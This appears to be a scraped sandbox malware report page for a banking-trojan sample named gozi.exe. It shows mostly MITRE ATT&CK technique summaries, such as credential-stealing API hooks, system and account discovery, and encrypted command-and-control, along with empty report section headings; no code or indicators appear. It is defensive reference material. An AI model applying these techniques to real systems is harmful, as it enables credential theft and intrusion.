Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report gozi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre